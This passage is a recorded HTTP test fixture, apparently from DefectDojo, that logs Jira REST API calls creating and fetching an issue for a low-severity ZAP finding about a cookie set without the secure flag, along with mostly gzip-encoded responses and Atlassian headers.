j2ds9sZvAAAA//+8l81uwjAMx19l6p1kHeUyaeI0aQf2CGgKKEoyAUVNGezQd5+dL1rSTe1ScXUT + +5fG8d8emxsYnFpvbLPj8IBYtZVL94BeTA0ce8dXAVFlpeqbJve33xBWdzTE2doiEpZ5FQmGCM+q + VQ9dfG//VBEbm+aYmcP7QLVngmuKO7R3osAglZDgnegv1Ht34jdrxAhGpOBnpMGalnca2JjUYz4l + Y86nwbT1vgv6bmwedZ6MWkyDChnZ5VyVZw9ZJEMuJoOMUnRlbB51kTVr7HPbLzEN/Z6pAKVme9J1 + uTfD+gf0CHkxrIKxAxYhuzkzkw85fl+UJqLi/CDLI9Qh8qkq9izkjIMez1DfwxY7tEG0a7F7hUUP + 2B9kYZyK0HrK3p9Vecc23DaiA050I7rxKOK8tboZa/C87nuaTOXkkVpHVJ8EXG29HClJfSNlg53e + uvkBAAD//wMAc91BljkVAAA= + headers: + ATL-TraceId: + - 2322b48b4e6dc5fb + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:07 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 6ae0b0c0-cea0-4be0-924e-ba654bac11c0 + x-envoy-upstream-service-time: + - '92' + status: + code: 200 + message: OK +- request: + body: '{"fields": {"project": {"key": "NTEST"}, "summary": "Zap1: Cookie Without + Secure Flag", "description": "\n\n\n\n\n\n*Title*: [Zap1: Cookie Without Secure + Flag|http://localhost:8080/finding/387]\n\n*Defect Dojo link:* http://localhost:8080/finding/387\n\n*Severity:* + Low \n\n*CWE:* Unknown\n\n\n\n*CVE:* Unknown\n\n\n*Product/Engagement/Test:* + [Security How-to|http://localhost:8080/product/2] / [weekly engagement|http://localhost:8080/engagement/3] + / [ZAP Scan|http://localhost:8080/test/112]\n\n*Branch/Tag:* None\n\n*BuildID:* + None\n\n*Commit hash:* None\n\n*Systems/Endpoints*: \n\n* https://mainsite.com:443\n* + https://mainsite.com\n* https://mainsite.com/dashboard\n\n*Description*:\nA + cookie has been set without the secure flag, which means that the cookie can + be accessed via unencrypted connections.\n\nReference: http://www.owasp.org/index.php/Testing_for_cookies_attributes_(OWASP-SM-002)\n\nURL: + https://mainsite.com/dashboard\nMethod: GET\nParameter: opvc\nEvidence: Set-Cookie: + opvc\n\nURL: https://mainsite.com/dashboard\nMethod: GET\nParameter: dmid\nEvidence: + Set-Cookie: dmid\n\nURL: https://mainsite.com\nMethod: GET\nParameter: sitevisitscookie\nEvidence: + Set-Cookie: sitevisitscookie\n\n\n*Mitigation*:\nWhenever a cookie contains + sensitive information or is a session token, then it should always be passed + using an encrypted channel. Ensure that the secure flag is set for cookies containing + such sensitive information.\n\n*Impact*:\nNo impact provided\n\n*Steps to reproduce*:\nNone\n\n*References*:\nCWE-614\nWASC-13\n\n\n*Defect + Dojo ID:* 387\n\n*Reporter:* [(admin) ()|mailto:]\n", "issuetype": {"name": + "Task"}, "priority": {"name": "Low"}}}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '1673' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: POST + uri: https://defectdojo.atlassian.net/rest/api/2/issue + response: + body: + string: '{"id":"10612","key":"NTEST-460","self":"https://defectdojo.atlassian.net/rest/api/2/issue/10612"}' + headers: + ATL-TraceId: + - 6dd2bbc561866e1a + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:08 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - c5843761-072d-4d3d-867a-dbe183b16a05 + x-envoy-upstream-service-time: + - '465' + status: + code: 201 + message: Created +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/NTEST-460 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - d23208d69d303fae + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:08 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 4737814d-ecaa-4991-a84f-05eb9d59700c + x-envoy-upstream-service-time: + - '121' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10612 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - 45dfb24ece8c847a + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:08 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - d3bacfa2-7acd-4901-ba01-302ab8c20667 + x-envoy-upstream-service-time: + - '149' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uuttlJNm23uYkeVGQV2j2JSNpOsJImpUmFZdn/boKL623em+/N + Y06kUx4PiyGSfIYwe7nZDKixD4P7clQFo7wflaUWA8nINy5+dDbCDIBRoJA3+9vX5uGlvW7369TF + ici3BGWQwXtGBpyNO05oQ3ucMR64M24dYqhbRzP8RohMgUJczHsVEsiBsxx4zsuWMckruRUUAG4g + wjHvcYm97Thd2W0OrOUgRSGhpkKUf2w/PVrtIijKoqg00xpR7OpaK5E0KlbxstjxKHjR12X9ryCY + 1PA0Loqkd7RaTXh2vUr2iZjLRNB+HBpyPv8AAAD//wMAww0SkFoBAAA= + headers: + ATL-TraceId: + - 0a29fef583d557ec + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:09 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 99892600-2f90-4b49-8fc9-c0c637044297 + x-envoy-upstream-service-time: + - '38' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - d71f7fe24cec7404 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:09 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 5a44be4b-8e9b-4a83-a6f6-40f46baf004d + x-envoy-upstream-service-time: + - '72' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/createmeta?projectKeys=NTEST&issuetypeNames=Task&expand=projects.issuetypes.fields + response: + body: + string: !!binary | + H4sIAAAAAAAAA+xWS0/jMBD+K1EOnCpCS8WiShVCy66EdoWQKFwQB5NMqKljBz/adBH/fT2JE7vQ + ZbPlsgd6qWcyj28envFzDFVJeBZP4lKKR0i1igf+OLl99gJUKQN6XQKKKGC55c21LtUkSTLIrUIm + HsU+0YwoRQnf56ATCUonpKTJKHFWk+GB/VkTFI22xALWlrqYfbuaWYqTAix5zanW1gA6JEuiibyW + 